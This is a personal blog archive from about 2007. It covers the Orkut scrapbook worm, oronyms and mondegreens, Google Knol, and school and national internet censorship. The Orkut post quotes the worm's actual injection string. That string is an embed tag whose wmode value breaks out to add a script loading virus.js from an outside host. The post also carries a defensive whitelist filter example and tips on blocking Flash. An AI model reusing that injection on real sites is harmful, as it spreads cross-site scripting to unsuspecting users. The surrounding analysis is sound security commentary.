Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your accounts, and perhaps your computer, are infected is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information will help ensure that people maintain their trust in your service.
December 2007 Archives
I had to head off and get some sleep last night, so I didn't have time to try and track this down, but others did. I've attached the javascript code below for those who want to see it.
I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.
I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.
The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.
Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.
The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.
Looking at the code, my guess is that the hole is here:
"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";
There is a "script" attribute provided to the embed of a Flash video. Letting the script element through allowed for arbitrary javascript execution in the context of the scrapbook page. Definitely not a good thing. It would certainly be possible for such a script to do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around, it's clear that this is probably the third variation of the exploit that has been used in recent days.
Javascript code can be found below the fold.
A photochrom of Mulberry Street in the borough of Manhattan, New York City, from the year 1900. Mulberry Street is the center of New York's Little Italy and continues into Chinatown.
I haven't been able to find a copy of the source yet, but the method of transmittal looks pretty straightforward.
You get an email notification (or find out on Orkut) that you have a new scrapbook entry. It's from a friend. It says.
2008 vem ai... que ele comece mto bem para vc (Portuguese: "2008 is coming... may it start really well for you")
There's no need to click on anything; just viewing it does the trick. The scrap deletes itself, and adds you to the Orkut Community "Infectados pelo Vírus do Orkut" ("Infected by the Orkut Virus"). That group, as I write this, is gaining members at a rate of at least one hundred per minute.
A quick (Google :-) translation of the description of the group produces the following:
CALM DOWN!
If you ended up in this community, rest assured that no data was stolen, nor will be; that is not my goal.
If I'm right, by the end of all this the community should be packed with people.
This is just to show how dangerous Orkut can be: you got here without clicking on any malicious link at all; everything was done just by reading scraps.
Orkut allows friend-to-friend scraps to contain HTML. Presumably there's a bug somewhere in the HTML filter which is allowing malicious Javascript to get through.
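Neither this post nor the follow-up above shows the filter Orkut actually used, so here is an added example (my code, not Orkut's or the worm author's) of how a scrapbook-style HTML filter can validate an embed tag attribute by attribute, next to the kind of blacklist filter that the quote break-out in the wmode value slips straight past. The allowed hosts, the attribute rules and the sample tags are all assumptions made for illustration.

```javascript
// Added example, not Orkut's code: a whitelist filter for user-supplied <embed>
// tags of the kind a scrapbook might accept. The failure the post guesses at is a
// filter that passes attribute values through unchecked; here every attribute has
// a rule and a tag failing any rule is dropped whole. Hosts and rules are assumptions.

const ALLOWED_MEDIA_HOSTS = new Set(["www.youtube.com", "video.example"]); // assumption

function isAllowedMediaUrl(value) {
  let url;
  try { url = new URL(value); } catch (e) { return false; }
  return (url.protocol === "http:" || url.protocol === "https:") &&
         ALLOWED_MEDIA_HOSTS.has(url.hostname);
}

// Per-attribute rules. A Map (not a plain object) so that names like
// "constructor" cannot resolve to an inherited function and pass as a rule.
const EMBED_ATTR_RULES = new Map([
  ["src", isAllowedMediaUrl],
  ["type", (v) => v === "application/x-shockwave-flash"],
  ["wmode", (v) => ["window", "opaque", "transparent"].includes(v.toLowerCase())],
  ["width", (v) => /^[1-9][0-9]{0,3}$/.test(v)],
  ["height", (v) => /^[1-9][0-9]{0,3}$/.test(v)],
]);

// Matches name="value", name='value', name=value or a bare name.
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

// Parses a single <embed ...></embed> tag into a Map, or null if it is not one.
// (Tag-level check for illustration; a production filter should work on a real
// HTML parser's tree rather than on regular expressions.)
function parseEmbedTag(tagHtml) {
  const m = /^<embed\b([^>]*?)\/?>(?:<\/embed>)?$/i.exec(tagHtml.trim());
  if (!m) return null;
  const attrs = new Map();
  for (const a of m[1].matchAll(ATTR_RE)) {
    const name = a[1].toLowerCase();
    if (attrs.has(name)) return null;          // duplicate attribute: ambiguous
    attrs.set(name, a[2] ?? a[3] ?? a[4] ?? "");
  }
  return attrs;
}

function escapeAttr(v) {
  return v.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Returns a canonical, rebuilt tag, or null when the tag must be dropped.
function sanitizeEmbed(tagHtml) {
  const attrs = parseEmbedTag(tagHtml);
  if (attrs === null || !attrs.has("src")) return null;
  const parts = [];
  for (const [name, value] of attrs) {
    const rule = EMBED_ATTR_RULES.get(name);
    if (!rule || !rule(value)) return null;    // unknown attribute (e.g. "script") or bad value
    parts.push(`${name}="${escapeAttr(value)}"`);
  }
  return `<embed ${parts.join(" ")}></embed>`;
}

// For contrast, a blacklist filter of the kind that lets the break-out through:
// it strips <script> tags and on* handlers but leaves other attribute values alone.
function naiveFilter(html) {
  return html.replace(/<script\b[\s\S]*?<\/script>/gi, "")
             .replace(/\son[a-z]+\s*=\s*("[^"]*"|'[^']*'|\S+)/gi, "");
}

// Constructed samples (placeholders, not the real worm payload).
const GOOD_EMBED = '<embed src="https://www.youtube.com/v/VIDEO_ID" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed>';
const BREAKOUT_EMBED = '<embed src="https://www.youtube.com/v/VIDEO_ID" type="application/x-shockwave-flash" wmode="transparent\'); PLACEHOLDER; escape(\'" width="1" height="1"></embed>';
const UNKNOWN_ATTR_EMBED = '<embed src="https://www.youtube.com/v/VIDEO_ID" type="application/x-shockwave-flash" script="PLACEHOLDER"></embed>';
```

The blacklist version returns the break-out sample unchanged, while the whitelist version rejects it because the wmode value is not one of the three values Flash defines, and rejects the "script" attribute because no rule exists for it.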
It does not appear at first glance that the worm does anything more dangerous than pass itself on to one or more of your friends. I think it unlikely that it would be able to steal your password, although it could potentially access other private information.
[Update. According to a posting on the Community site by the author of the virus, it can be blocked by blocking Flash.]
How to protect yourself so it doesn't come back
Well, many people don't like being put into the community; that is your right, although it is only a joke.
But just as I am doing it, someone else could do it to try to hurt someone.
Since some people asked, I will explain here how to protect yourself.
Firefox (easier):
- Install the Flashblock extension
https://addons.mozilla.org/en-US/firefox/addon/433
- Restart Firefox and you're done
If you don't have Firefox, download it here:
http://www.mozilla.com/en-US/firefox/
Internet Explorer:
- Go to the Tools menu -> Internet Options
- Click on the Security tab
- In the Web content zone list, leave Internet selected
- Click Custom Level...
- Find the "ActiveX controls and plug-ins" section
- Disable the option "Run ActiveX controls and plug-ins"
With that you will no longer see, for example, YouTube videos, either inside or outside Orkut, but at least you will be safe.
I suggest you download Firefox because it is easier to enable and disable there.
All I really wanted to do was find the most recent email address of a friend. It was a mere matter of checking for the most recent email message from him, but he has one of those random .signature generators, and it had this interesting little poem. An hour (at least) later, here we are.
My Spill Chequer
Eye halve a spelling chequer
It came with my pea sea
It plainly marques four my revue
Miss steaks eye kin knot sea.
Eye strike a key and type a word
And weight four it two say
Weather eye am wrong oar write
It shows me strait a weigh.
As soon as a mist ache is maid
It nose bee fore two long
And eye can put the error rite
Its rarely ever wrong.
Eye have run this poem threw it
I am shore your pleased two no
Its letter perfect in it's weigh
My chequer tolled me sew.
(Sauce unknown)
So I started searching to see who wrote it. I didn't find that, but I did come across a lovely word: "oronym". It isn't in my online dictionary (it's a relatively recent neologism, another lovely word), but Wikipedia (of course) has it. It says:
This term was coined by Gyles Brandreth and first published in his book The Joy of Lex (1980), and it was used in the BBC programme Never Mind the Full Stops, which also featured Brandreth as a guest.
Oronyms are basically homophones which span words. They work in spoken English (and often depend on dialects) because we run all our words together. The above poem uses them of course, but there's a more famous example. (This version taken from Fun With Words.) I've heard this one before, although I'd forgotten it. Once upon a time :-) I had a friend who could recite the entire piece.
An Oronym Story – Ladle Rat Rotten Hut
Even more impressive in length is the following oronym story. It is the tale of Little Red Riding Hood... but not the famous version; this one is constructed entirely from homophones: Ladle Rat Rotten Hut. This curious version was written in 1940 by a professor of French named H. L. Chace. He wanted to show his students that intonation is an integral part of the meaning of language. Try reading it out loud (best in the accent of Southern/Central USA)!
Wants pawn term, dare worsted ladle gull hoe lift wetter murder inner ladle cordage, honor itch offer lodge, dock, florist. Disk ladle gull orphan worry putty ladle rat cluck wetter ladle rat hut, an fur disk raisin pimple colder Ladle Rat Rotten Hut.
Wan moaning, Ladle Rat Rotten Hut's murder colder inset. "Ladle Rat Rotten Hut, heresy ladle basking winsome burden barter an shirker cockles. Tick disk ladle basking tutor cordage offer groinmurder hoe lifts honor udder site offer florist. Shaker lake! Dun stopper laundry wrote! Dun stopper peck floors! Dun daily-doily inner florist, an yonder nor sorghum-stenches, dun stopper torque wet strainers!"
"Hoe-cake, murder," resplendent Ladle Rat Rotten Hut, an tickle ladle basking an stuttered oft. Honor wrote tutor cordage offer groin-murder, Ladle Rat Rotten Hut mitten anomalous woof. "Wail, wail, wail!" set disk wicket woof, "Evanescent Ladle Rat Rotten Hut! Wares are putty ladle gull goring wizard ladle basking?"
"Armor goring tumor groin-murder's," reprisal ladle gull. "Grammar's seeking bet. Armor ticking arson burden barter an shirker cockles."
"O hoe! Heifer gnats woke," setter wicket woof, butter taught tomb shelf, "Oil tickle shirt court tutor cordage offer groin-murder. Oil ketchup wetter letter, an den - O bore!"
Soda wicket woof tucker shirt court, an whinney retched a cordage offer groin-murder, picked inner windrow, an sore debtor pore oil worming worse lion inner bet. En inner flesh, disk abdominal woof lipped honor bet, paunched honor pore oil worming, an garbled erupt. Den disk ratchet ammonol pot honor groin-murder's nut cup an gnat-gun, any curdled ope inner bet.
Inner ladle wile, Ladle Rat Rotten Hut a raft attar cordage, an ranker dough ball. "Comb ink, sweat hard," setter wicket woof, disgracing is verse. Ladle Rat Rotten Hut entity betrum an stud buyer groin-murder's bet.
"O Grammar!" crater ladle gull historically, "Water bag icer gut! A nervous sausage bag ice!"
"Battered lucky chew whiff, sweat hard," setter bloat-Thursday woof, wetter wicket small honors phase.
"O Grammar, water bag noise! A nervous sore suture anomolous prognosis!"
"Battered small your whiff, doling," whiskered dole woof, ants mouse worse waddling.
"O Grammar, water bag mouser gut! A nervous sore suture bag mouse!"
Daze worry on-forger-nut ladle gull's lest warts. Oil offer sodden, caking offer carvers an sprinkling otter bet, disk hoard hoarded woof lipped own pore Ladle Rat Rotten Hut an garbled erupt.
Mural: Yonder nor sorghum stenches shut ladle gulls stopper torque wet strainers.
The same Fun With Words page also then references "mondegreens" (another new word!), which are misheard lyrics.
The term mondegreen was originally coined by author Sylvia Wright, and has come to be quite widely used. As a child, Wright heard the lyrics of The Bonny Earl of Murray (a Scottish ballad) as:
Ye highlands and ye lowlands
Oh where hae you been?
Thou hae slay the Earl of Murray
And Lady Mondegreen
It eventually transpired that Lady Mondegreen existed only in the mind of Sylvia Wright, for the actual lyrics said that they "slay the Earl of Murray and laid him on the green." And to this day Lady Mondegreen's name has been used to describe all mishearings of this type!
You see these a lot on the web, when people are writing down the lyrics to their favorite songs. I remember stumbling across this one. The song is Natasha Bedingfield's "These Words". The verse goes:
Read some Byron, Shelley and Keats,
recited it over a hip-hop beat
I'm havin trouble sayin what i mean,
with dead poets and a drum machine
But the first version I found online (on some poor girl's journal) was:
Written by Ricelli and Keys
Resided in over a heartbeat
I'm having trouble saying what I mean
With dead poets and drum machines
And now I think I better get back to sending my friend that email message!
It's early morning and the buzz on Google's Knol is already building fast. I'm not going to rehash what others are saying; you can go read them for yourself.
Google calls a "knol" a unit of knowledge (this from the people who misspelled "googol"). Google says the goal is to "find a way to help people share their knowledge", and Google Knol is the place where they can do that; as authors, contributors and commenters. Everyone has jumped on this and said it's a Wikipedia competitor, and maybe in the long run that is true, but that ignores an important distinction; Knol is focused on highlighting authors. Google calls this the "key idea", and I think they are absolutely right.
Wikipedia leverages the wisdom of the crowd to build collaborative articles. It relies on multiple authors, many eyes, consensus and majority rule to get accuracy. In a lot of cases that works well. However, it suffers from all the usual problems of a democratic system. Backroom deals can skew the results. Controversial subjects can require special protection, which gives more control to the editors. And majority rule can stifle new ideas or legitimate criticism. Again, those in control of the overall system can exercise a great deal of power that isn't especially visible to the outside world. And of course, sometimes the things which "everybody knows" aren't always correct.
If Wikipedia is a communist democracy (and I mean that in a completely positive sense, you can't truly have the former without the latter), then Google Knol is a meritocracy. The key is something that has been talked about in social networking circles for several years. Knol depends on reputation. The author of the article is prominent. You see everything else they have written. You see what their peers think of them (and who their peers are). You see what commenters have said about them. Knol is blogging with a focus, an attempt to move beyond general topic pundits and bring in the specialists. The author of the article is a known identity which can be tied to other articles in the past and future. (Note that I don't say "person". It could be a group, and of course we don't necessarily have to know the physical identity. The key behind combining reputation and anonymity is the concept of a long term identity. In the ideal system, nobody knows that you're a dog, but they know that you're the same dog.) Knol attempts to ensure accuracy by assuming that a persistent identity (e.g. your Google account) will encourage you to try and maintain a good reputation. Your reputation in turn depends on how much support you can garner from your peers, contributors and commenters.
The usual problems with online reputation systems apply here of course. Online identities can be discarded when they become tarnished. In some cases that's a feature—there are certainly aspects of my past I'd love to discard that easily—but if identities are easy to come by it weakens the power of reputation. That is countered however, by the fact that it takes time to build a reputation, and discarded articles don't drive traffic. More worrisome is the degree to which people can jazz the system by creating multiple identities that work together to build a buzz and the appearance of consensus. But then, Wikipedia has the same weakness. Even real world systems are susceptible to fake groundswells.
In general, I think the idea has a lot of merit, and it's likely to result in a lot of in-depth and well organized articles (the current Knol screen shot shows a very professional looking page—much nicer than your typical wiki). The big question is whether it will gain the breadth that Wikipedia has, and how it will evolve over time. Who maintains articles when the author loses interest (or dies)? People can make contributions and comments, but they aren't directly editing (or will it allow edits, but with publication under control of the author?). I keep coming back to the first Wikipedia edit my daughter made. She was writing an article on the Oregon Trail (a mock tourism brochure, actually) and in the course of her research she discovered that Wikipedia had the length of the trail wrong—so she fixed it. How easy (and immediate) would that process be using Knol? And what happens when over time there are thirty different articles on the same subject? Have we just recreated the web? (Well, at least we know it won't do away with the need for Google's search engine :-).
Like most Google projects, Knol is starting out on an invitation basis, although in this case I suspect invitations will be a bit harder to get than usual. The initial focus will probably be more on quality than quantity. I think the idea of a reputation-based system, and the appeal of an author-centric system, will make it successful, but I don't see it replacing Wikipedia. If anything, I think merging the two concepts, combining both authored and crowd-sourced systems into a single repository, would make more sense. It seems unlikely that Wikipedia would do anything so drastically different, and starting a "new" Wikipedia would be hard for anyone to do, so unfortunately it's not likely to happen. I guess we'll all have to get used to searching two locations and sending our edits to two different sites.

Yesterday my daughter Shireen asked me again to help her get around the filters at school. She can get to her email, but she can't get to DeviantArt, where she posts photos and artwork. Nor can she use her IM client, and she'd wanted to ask me a question while she was at school. I pointed her at a web IM client that would probably work, and promised to set up an encrypted proxy server on our web site so she could browse wherever she wanted. I also pointed out that her problem is in miniature the same problem faced by millions of folks in Iran, China and other countries that try to restrict the flow of information to and from the internet.
While I can sympathize (in theory) with people who see the internet as a corrupting influence, I do not sympathize with the view of "the State as parent", and furthermore, I believe the correct solution to corrupting influences (whether you are a parent or a country) is education and knowledge—not hiding them under a rock and pretending they don't exist. If your meme can't win the battle of information, then it doesn't deserve to survive. (I suppose it's not terribly surprising that such a darwinist approach to ideas doesn't go over well with theocracies. :-) And of course in the case of Iran and China, two of the biggest censorship offenders (how nice to know that Iran is using American software to do the job), the censorship has far more to do with maintaining power than any particular ideology.
In any case, while looking for something completely different this morning, I came across the following Firefox web browser extension.
I actually hadn't realized that Iran blocked Flickr, there's an active Iranian community there.
I suppose I shouldn't be surprised. But it's a pity, Flickr's a great way to see what Iran really looks like right now.
Interesting. In summary, this study shows that Alzheimer's isn't in itself a reason for decreased mental functions. Some people who remained mentally active by doing lots of things requiring mental skills, had normal cognitive skills even though autopsies showed that they had Alzheimer's.
Of course, just to put a mild damper on it, I'll point out that we don't *know* that the mental activity actually prevented harm. For all we know there's some other genetic difference which makes it possible for some people to work around the damage. But in the meantime, keep mental exercising! (Mentaling?)
When I first introduced my daughter to Wikipedia, she was in middle school. She used it as one of her sources for a project on the Oregon Trail. But she went a step further. She set up a Wikipedia account and corrected an error in the entry. Ever since then she has made it a regular part of her research, using it as one of many sources and updating it when she's done. What better lesson to our kids (and what better motivator) than learning that knowledge isn't just for school, it's for sharing and teaching as well?
Updated: Feb 27, 2008 to add:
FWIW, here's my daughter's Oregon Trail "Brochure" (4MB PDF).
There are a few precautions you must take to travel the Oregon Trail. But when you get to your lovely destination, the river crossings, exhaustion, accidents, bad weather, cholera, indian attacks, starvation, stampedes, rattle snakes, dysentery, scorpions, bandits and broken-down wagons will all be behind you.
Admittedly, CNet has a tech focus, but it bothers me that they aren't even mentioning the biggest error that contributed to James Kim's death.
The real tragedy (and it's repeated over and over again), is that there are two basic rules you should always follow when you are lost and hoping for rescue. Maybe you had to be a Boy Scout to get these, but they ought to be part of everyone's education.
- Stay together.
- Stay in one place.
When James Kim went for help (and off the road, at that), he violated both of those rules. Any article about his death should emphasize those rules, because they are far more likely to save lives than a stray cell phone signal.
This is absolutely insane.
That's right. If you purchase this disk, it will refuse to share media files with other users because they haven't been "licensed". There's a lot of talk about how organizations like the RIAA are hurting consumers, but there's a group here that has been hurt even more. I challenge you to get together with a bunch of your friends and find any commercial building which will allow you to just hang out and play music together in public. And should you actually record that music and put it on the web, watch idiot companies like this block your ability to share it. The RIAA wants all music to be commercial. As far as they are concerned, the amateur musician died the day piano rolls were introduced.